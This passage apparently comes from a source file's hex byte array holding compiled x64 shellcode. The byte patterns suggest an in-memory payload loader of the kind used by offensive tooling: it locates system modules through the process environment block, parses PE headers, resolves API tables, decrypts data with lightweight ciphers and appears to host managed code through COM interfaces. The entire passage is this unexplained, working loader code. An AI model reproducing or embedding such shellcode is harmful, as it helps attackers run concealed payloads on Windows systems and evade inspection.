633 0x4c, 0x8b, 0xc7, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x8b, 0x85,
634 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x48,
635 0x0f, 0x44, 0xcf, 0x41, 0xff, 0xd6, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0x41,
636 0xff, 0xd6, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x4d, 0x8d, 0x87, 0x0c, 0x04,
637 0x00, 0x00, 0x45, 0x38, 0x20, 0x74, 0x2a, 0x48, 0x8d, 0x44, 0x24, 0x40,
638 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff,
639 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70,
640 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce, 0xe8, 0x7f, 0x03, 0x00,
641 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xe8, 0x89,
642 0x0b, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x49, 0x8b, 0xcd,
643 0xe8, 0x7b, 0x0b, 0x00, 0x00, 0x45, 0x39, 0x67, 0x04, 0x74, 0x2d, 0x4c,
644 0x89, 0x64, 0x24, 0x28, 0x45, 0x33, 0xc9, 0x4c, 0x8b, 0xc5, 0x44, 0x89,
645 0x64, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x88, 0x00, 0x00,
646 0x00, 0x48, 0x85, 0xc0, 0x74, 0x1d, 0x83, 0xca, 0xff, 0x48, 0x8b, 0xc8,
647 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xeb, 0x0f, 0x65, 0x48, 0x8b, 0x0c,
648 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x60, 0xff, 0xd5, 0x33,
649 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xff, 0x56,
650 0x50, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
651 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
652 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x20, 0x55, 0x57,
653 0x41, 0x56, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0xfc, 0xff, 0xff, 0x48, 0x81,
654 0xec, 0x40, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0x48,
655 0x8b, 0x91, 0x18, 0x09, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
656 0x33, 0xc9, 0x48, 0x8d, 0x14, 0x55, 0x02, 0x00, 0x00, 0x00, 0x44, 0x8d,
657 0x49, 0x04, 0xff, 0x56, 0x48, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x0f,
658 0x84, 0x94, 0x02, 0x00, 0x00, 0x8b, 0x8b, 0x24, 0x05, 0x00, 0x00, 0x4c,
659 0x8d, 0x83, 0x28, 0x05, 0x00, 0x00, 0x03, 0xc9, 0x83, 0xcb, 0xff, 0x89,
660 0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
661 0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
662 0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
663 0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x94, 0xe3, 0xff, 0xff,
664 0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x19,
665 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x76, 0xe2,
666 0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xf3, 0xe2, 0xff,
667 0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x70, 0xe2, 0xff, 0xff,
668 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x61, 0xe2, 0xff, 0xff, 0x48,
669 0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x56, 0xe2, 0xff, 0xff, 0x48, 0x89,
670 0x45, 0xb0, 0x48, 0x8d, 0x05, 0x4b, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45,
671 0xb8, 0x48, 0x8d, 0x05, 0xd8, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
672 0x48, 0x8d, 0x05, 0x35, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
673 0x8d, 0x05, 0x2a, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
674 0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0xb2, 0xe1,
675 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x96, 0xe1,
676 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xf2, 0xe1,
677 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x86, 0xe1,
678 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x7a, 0xe1,
679 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
680 0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x9c, 0xeb, 0xff, 0xff,
681 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x48, 0x01, 0x00, 0x00, 0x85, 0xc0,
682 0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
683 0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x94, 0x06, 0x00, 0x00, 0x48, 0x89,
684 0x44, 0x24, 0x20, 0x48, 0x8d, 0x8e, 0x74, 0x06, 0x00, 0x00, 0x44, 0x8d,
685 0x43, 0x04, 0xff, 0x96, 0x50, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85,
686 0x1e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48,
687 0x8d, 0x96, 0xd4, 0x06, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x70, 0x03, 0x00,
688 0x00, 0x48, 0x8b, 0x01, 0xff, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0xe2, 0x00,
689 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01,
690 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48,
691 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89,
692 0x4d, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85,
693 0xa3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x30, 0x01, 0x00, 0x00, 0xc7,
694 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0xe0, 0x05,
695 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8b, 0xcb, 0x33, 0xd2,
696 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d, 0x8d, 0x30, 0x01, 0x00, 0x00,
697 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00,
698 0x00, 0x44, 0x8d, 0x43, 0x03, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xf8, 0x4c,
699 0x8b, 0x09, 0x41, 0xff, 0x51, 0x40, 0x48, 0x8b, 0xcf, 0x8b, 0xd8, 0xff,
700 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x4a, 0x48, 0x83, 0x64,
701 0x24, 0x48, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00,
702 0x45, 0x33, 0xc0, 0x21, 0x5c, 0x24, 0x38, 0x49, 0x8b, 0xd6, 0x48, 0x8b,
703 0x8d, 0x70, 0x03, 0x00, 0x00, 0x21, 0x5c, 0x24, 0x30, 0x48, 0x83, 0x64,
704 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x8b, 0x01,
705 0xff, 0x50, 0x28, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b, 0x8d, 0x60, 0x03,
706 0x00, 0x00, 0x8d, 0x53, 0x02, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x28, 0x48,
707 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
708 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50,
709 0x38, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
710 0x50, 0x10, 0x44, 0x8b, 0x86, 0x18, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x49,
711 0x8b, 0xce, 0x46, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0xe8, 0x41,
712 0x08, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x49,
713 0x8b, 0xce, 0xff, 0x56, 0x50, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x04, 0x00,
714 0x00, 0x49, 0x8b, 0x5b, 0x28, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0xe3,
715 0x41, 0x5e, 0x5f, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
716 0x18, 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41,
717 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00,
718 0x65, 0x48, 0x8b, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf1,
719 0x48, 0x81, 0xc1, 0x4c, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x68, 0x60, 0x4d,
720 0x8b, 0x65, 0x20, 0x4c, 0x89, 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff,
721 0x56, 0x40, 0x33, 0xc9, 0x4c, 0x8b, 0xd8, 0x4c, 0x63, 0x48, 0x3c, 0x4c,
722 0x03, 0xc8, 0x45, 0x0f, 0xb7, 0x51, 0x14, 0x45, 0x0f, 0xb7, 0x41, 0x06,
723 0x4d, 0x03, 0xd1, 0x45, 0x85, 0xc0, 0x74, 0x19, 0x44, 0x8b, 0x8e, 0x44,
724 0x03, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x89, 0x45, 0x39, 0x4c, 0xc2, 0x18,
725 0x74, 0x73, 0xff, 0xc1, 0x41, 0x3b, 0xc8, 0x72, 0xee, 0x8b, 0x9c, 0x24,
726 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xbc, 0x24, 0xf0, 0x00, 0x00, 0x00,
727 0x33, 0xed, 0x85, 0xdb, 0x74, 0x3a, 0x4c, 0x8b, 0xf7, 0x49, 0x8b, 0x56,
728 0x08, 0x48, 0x8b, 0xce, 0xe8, 0xeb, 0xec, 0xff, 0xff, 0x85, 0xc0, 0x74,
729 0x1d, 0x41, 0xb0, 0x01, 0x49, 0x8d, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd6,
730 0xff, 0x96, 0x60, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x45, 0x4c, 0x8b,
731 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff, 0xc5, 0x49, 0x83, 0xc6, 0x08,
732 0x3b, 0xeb, 0x72, 0xc9, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0x00, 0x01,
733 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41,
734 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x8d, 0x04,
735 0x89, 0x41, 0x8b, 0x7c, 0xc2, 0x24, 0x41, 0x8b, 0x5c, 0xc2, 0x20, 0x49,
736 0x03, 0xfb, 0xc1, 0xeb, 0x03, 0xeb, 0x8d, 0x41, 0xb0, 0x01, 0x49, 0x8d,
737 0x54, 0x24, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xff, 0x96, 0x70, 0x01,
738 0x00, 0x00, 0x48, 0x8b, 0x94, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x49, 0x8b,
739 0xce, 0xff, 0x96, 0x90, 0x01, 0x00, 0x00, 0x33, 0xed, 0x4c, 0x8b, 0xff,
740 0x49, 0x8b, 0x57, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x58, 0xec, 0xff, 0xff,
741 0x85, 0xc0, 0x74, 0x15, 0x41, 0xb0, 0x01, 0x48, 0x8d, 0x4c, 0x24, 0x20,
742 0x49, 0x8b, 0xd7, 0xff, 0x96, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75,
743 0x13, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x49, 0x83, 0xc7, 0x08, 0x41,
744 0x03, 0xe9, 0x3b, 0xeb, 0x73, 0x2d, 0xeb, 0xc8, 0x41, 0xb0, 0x01, 0x48,
745 0x8d, 0x4c, 0x24, 0x20, 0x49, 0x8b, 0xd6, 0xff, 0x96, 0x70, 0x01, 0x00,
746 0x00, 0x48, 0x8d, 0x0c, 0xef, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
747 0x8d, 0x54, 0x24, 0x20, 0xe8, 0x77, 0x06, 0x00, 0x00, 0x41, 0xb9, 0x01,
748 0x00, 0x00, 0x00, 0x49, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x78, 0x10, 0xe9,
749 0xdb, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0xbe, 0x6c, 0x03, 0x00, 0x00, 0x41,
750 0x8a, 0x0f, 0x33, 0xed, 0x33, 0xd2, 0x45, 0x8b, 0xe1, 0x84, 0xc9, 0x0f,
751 0x84, 0xbf, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x80, 0xf9, 0x3b, 0x74,
752 0x2e, 0x81, 0xfa, 0x80, 0x00, 0x00, 0x00, 0x73, 0x26, 0x33, 0xc0, 0x42,
753 0x88, 0x4c, 0x04, 0x30, 0x80, 0xf9, 0x77, 0x41, 0x0f, 0x45, 0xc4, 0x80,
754 0xf9, 0x70, 0x44, 0x8b, 0xe0, 0x41, 0x0f, 0x44, 0xe9, 0x41, 0x03, 0xd1,
755 0x44, 0x8b, 0xc2, 0x42, 0x8a, 0x0c, 0x3a, 0x84, 0xc9, 0x75, 0xcd, 0x85,
756 0xd2, 0x0f, 0x84, 0x81, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0x01, 0xc6, 0x44,
757 0x14, 0x30, 0x00, 0x4c, 0x03, 0xf9, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
758 0x8b, 0x4f, 0x30, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01,
759 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x8b, 0x45, 0x85, 0xe4, 0x74,
760 0x29, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
761 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x0f, 0x84, 0x6e, 0xff, 0xff,
762 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84, 0x64, 0xff, 0xff, 0xff, 0x48,
763 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x26, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3,
764 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb,
765 0x0f, 0x84, 0x45, 0xff, 0xff, 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84,
766 0x3b, 0xff, 0xff, 0xff, 0x49, 0x8b, 0x46, 0x08, 0x48, 0x89, 0x03, 0xe9,
767 0x2f, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00,
768 0x0f, 0x85, 0x1a, 0xff, 0xff, 0xff, 0x41, 0x8b, 0xc1, 0xe9, 0x48, 0xfe,
769 0xff, 0xff, 0xcc, 0xcc, 0x41, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
770 0xc0, 0xc3, 0xcc, 0xcc, 0x2b, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc, 0xcc,
771 0x44, 0x8b, 0xc2, 0x8b, 0xc1, 0x99, 0x41, 0xf7, 0xf8, 0xc3, 0xcc, 0xcc,
772 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
773 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x04,
774 0x25, 0x30, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48,
775 0x8b, 0xe9, 0x45, 0x33, 0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41,
776 0x18, 0x48, 0x8b, 0x58, 0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20,
777 0x4c, 0x8b, 0xcf, 0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd,
778 0xe8, 0xc3, 0xe3, 0xff, 0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48,
779 0x8b, 0x43, 0x30, 0x48, 0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24,
780 0x30, 0x49, 0x8b, 0xc2, 0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74,
781 0x24, 0x40, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0x48, 0x89, 0x5c, 0x24,
782 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
783 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x30, 0x33, 0xff, 0x33, 0xed,
784 0x45, 0x33, 0xf6, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf9, 0x42, 0x8a, 0x54,
785 0x3d, 0x00, 0x84, 0xd2, 0x74, 0x11, 0x83, 0xfd, 0x40, 0x74, 0x0c, 0x8b,
786 0xc7, 0xff, 0xc7, 0xff, 0xc5, 0x88, 0x54, 0x04, 0x20, 0xeb, 0x56, 0x8b,
787 0xc7, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0x48, 0x03, 0xd8, 0x41, 0xb8, 0x10,
788 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x44, 0x2b, 0xc7, 0x33, 0xd2, 0xe8,
789 0xa4, 0x04, 0x00, 0x00, 0xc6, 0x03, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x20,
790 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x63, 0x00, 0x00,
791 0x00, 0x33, 0xd2, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0x48, 0x33, 0xf0, 0x44,
792 0x8d, 0x42, 0x10, 0xe8, 0x7c, 0x04, 0x00, 0x00, 0x8b, 0xc5, 0xbf, 0x10,
793 0x00, 0x00, 0x00, 0xc1, 0xe0, 0x03, 0x89, 0x44, 0x24, 0x2c, 0x41, 0xff,
794 0xc6, 0x83, 0xff, 0x10, 0x75, 0x12, 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c,
795 0x24, 0x20, 0xe8, 0x2d, 0x00, 0x00, 0x00, 0x48, 0x33, 0xf0, 0x33, 0xff,
796 0x45, 0x85, 0xf6, 0x0f, 0x84, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
797 0x24, 0x50, 0x48, 0x8b, 0xc6, 0x48, 0x8b, 0x74, 0x24, 0x60, 0x48, 0x8b,
798 0x6c, 0x24, 0x58, 0x48, 0x83, 0xc4, 0x30, 0x41, 0x5f, 0x41, 0x5e, 0x5f,
799 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x10,
800 0x0f, 0x10, 0x01, 0x48, 0x89, 0x50, 0x10, 0x8b, 0xca, 0x44, 0x8b, 0x40,
801 0x14, 0x45, 0x33, 0xd2, 0x0f, 0x11, 0x04, 0x24, 0x8b, 0x50, 0xf4, 0x44,
802 0x8b, 0x58, 0xf0, 0x8b, 0x58, 0xec, 0x44, 0x8b, 0x0c, 0x24, 0x8b, 0xc2,
803 0xc1, 0xc9, 0x08, 0x41, 0x03, 0xc8, 0x8b, 0xd3, 0x41, 0x33, 0xc9, 0xc1,
804 0xca, 0x08, 0x41, 0x03, 0xd1, 0x41, 0xc1, 0xc0, 0x03, 0x41, 0x33, 0xd2,
805 0x41, 0xc1, 0xc1, 0x03, 0x44, 0x33, 0xca, 0x44, 0x33, 0xc1, 0x41, 0xff,
806 0xc2, 0x41, 0x8b, 0xdb, 0x44, 0x8b, 0xd8, 0x41, 0x83, 0xfa, 0x1b, 0x72,
807 0xcd, 0x89, 0x4c, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24, 0x2c, 0x48, 0x8b,
808 0x44, 0x24, 0x28, 0x48, 0x83, 0xc4, 0x10, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
809 0x45, 0x85, 0xc9, 0x0f, 0x84, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c,
810 0x24, 0x08, 0x48, 0x89, 0x7c, 0x24, 0x10, 0x4c, 0x89, 0x74, 0x24, 0x18,
811 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x10, 0x4c, 0x8b, 0xd1, 0x48,
812 0x8d, 0x45, 0xf0, 0x4c, 0x2b, 0xd0, 0x4d, 0x8b, 0xd8, 0x48, 0x8b, 0xfa,
813 0x41, 0xbe, 0x10, 0x00, 0x00, 0x00, 0x0f, 0x10, 0x07, 0x48, 0x8d, 0x4d,
814 0xf0, 0xba, 0x04, 0x00, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0xf0, 0x41,
815 0x8b, 0x04, 0x0a, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48, 0x83, 0xea,
816 0x01, 0x75, 0xf0, 0x8b, 0x55, 0xfc, 0x49, 0x8b, 0xde, 0x8b, 0x45, 0xf8,
817 0x44, 0x8b, 0x45, 0xf4, 0x8b, 0x4d, 0xf0, 0x41, 0x03, 0xc8, 0x03, 0xc2,
818 0x41, 0xc1, 0xc0, 0x05, 0x44, 0x33, 0xc1, 0xc1, 0xc2, 0x08, 0x33, 0xd0,
819 0xc1, 0xc1, 0x10, 0x41, 0x03, 0xc0, 0x03, 0xca, 0x41, 0xc1, 0xc0, 0x07,
820 0xc1, 0xc2, 0x0d, 0x44, 0x33, 0xc0, 0x33, 0xd1, 0xc1, 0xc0, 0x10, 0x48,
821 0x83, 0xeb, 0x01, 0x75, 0xd2, 0x89, 0x55, 0xfc, 0x8d, 0x53, 0x04, 0x89,
822 0x4d, 0xf0, 0x48, 0x8d, 0x4d, 0xf0, 0x44, 0x89, 0x45, 0xf4, 0x89, 0x45,
823 0xf8, 0x42, 0x8b, 0x04, 0x11, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48,
824 0x83, 0xea, 0x01, 0x75, 0xf0, 0x45, 0x3b, 0xce, 0x41, 0x8b, 0xc9, 0x41,
825 0x0f, 0x47, 0xce, 0x85, 0xc9, 0x74, 0x1b, 0x4c, 0x8d, 0x45, 0xf0, 0x8b,
826 0xd9, 0x4d, 0x2b, 0xc3, 0x49, 0x8b, 0xd3, 0x41, 0x8a, 0x04, 0x10, 0x30,
827 0x02, 0x48, 0xff, 0xc2, 0x48, 0x83, 0xeb, 0x01, 0x75, 0xf1, 0x44, 0x2b,
828 0xc9, 0x8b, 0xc1, 0x4c, 0x03, 0xd8, 0x41, 0x8b, 0xd6, 0x8d, 0x42, 0xff,
829 0x80, 0x04, 0x38, 0x01, 0x75, 0x06, 0xff, 0xca, 0x85, 0xd2, 0x7f, 0xf1,
830 0x45, 0x85, 0xc9, 0x0f, 0x85, 0x31, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
831 0x24, 0x20, 0x48, 0x8b, 0x7c, 0x24, 0x28, 0x4c, 0x8b, 0x74, 0x24, 0x30,
832 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
833 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
834 0x89, 0x70, 0x20, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x40, 0x8a,
835 0x01, 0x41, 0x83, 0xce, 0xff, 0x83, 0x65, 0xf4, 0x00, 0x45, 0x33, 0xc9,
836 0x88, 0x02, 0x33, 0xff, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x8b, 0xda, 0x48,
837 0x89, 0x45, 0xe8, 0x45, 0x8b, 0xde, 0x48, 0x8d, 0x41, 0x01, 0x48, 0x89,
838 0x45, 0xe0, 0x8d, 0x77, 0x01, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xf6, 0x01,
839 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00, 0x48, 0x8d,
840 0x4d, 0xe0, 0xe8, 0xe5, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x9f,
841 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xd4, 0x01, 0x00, 0x00,
842 0x85, 0xc0, 0x74, 0x4e, 0x45, 0x33, 0xc9, 0x45, 0x8d, 0x51, 0x04, 0x48,
843 0x8d, 0x4d, 0xe0, 0xe8, 0xc0, 0x01, 0x00, 0x00, 0x46, 0x8d, 0x0c, 0x48,
844 0x44, 0x2b, 0xd6, 0x75, 0xee, 0x45, 0x85, 0xc9, 0x74, 0x1d, 0x48, 0x8b,
845 0x55, 0xe8, 0x48, 0x8b, 0xc2, 0x41, 0x8b, 0xc9, 0x48, 0x2b, 0xc1, 0x8a,
846 0x00, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0x6b,
847 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0xc6, 0x00, 0x00, 0x48, 0x03,
848 0xc6, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8b,
849 0x45, 0xe0, 0x44, 0x0f, 0xb6, 0x18, 0x48, 0x03, 0xc6, 0x41, 0x8b, 0xcb,
850 0x48, 0x89, 0x45, 0xe0, 0x23, 0xce, 0x83, 0xc1, 0x02, 0x41, 0xd1, 0xeb,
851 0x74, 0x21, 0x48, 0x8b, 0x55, 0xe8, 0x45, 0x8b, 0xc3, 0x49, 0xf7, 0xd8,
852 0x41, 0x8a, 0x04, 0x10, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x41, 0x03, 0xce,
853 0x75, 0xf2, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b,
854 0xfe, 0xe9, 0xf5, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xd6, 0x48, 0x8d, 0x4d,
855 0xe0, 0xe8, 0x32, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d,
856 0x14, 0x50, 0xe8, 0x25, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x45,
857 0x85, 0xc9, 0x75, 0x48, 0x41, 0x83, 0xfa, 0x02, 0x75, 0x42, 0x44, 0x8b,
858 0xce, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0x0a, 0x01, 0x00, 0x00, 0x48, 0x8d,
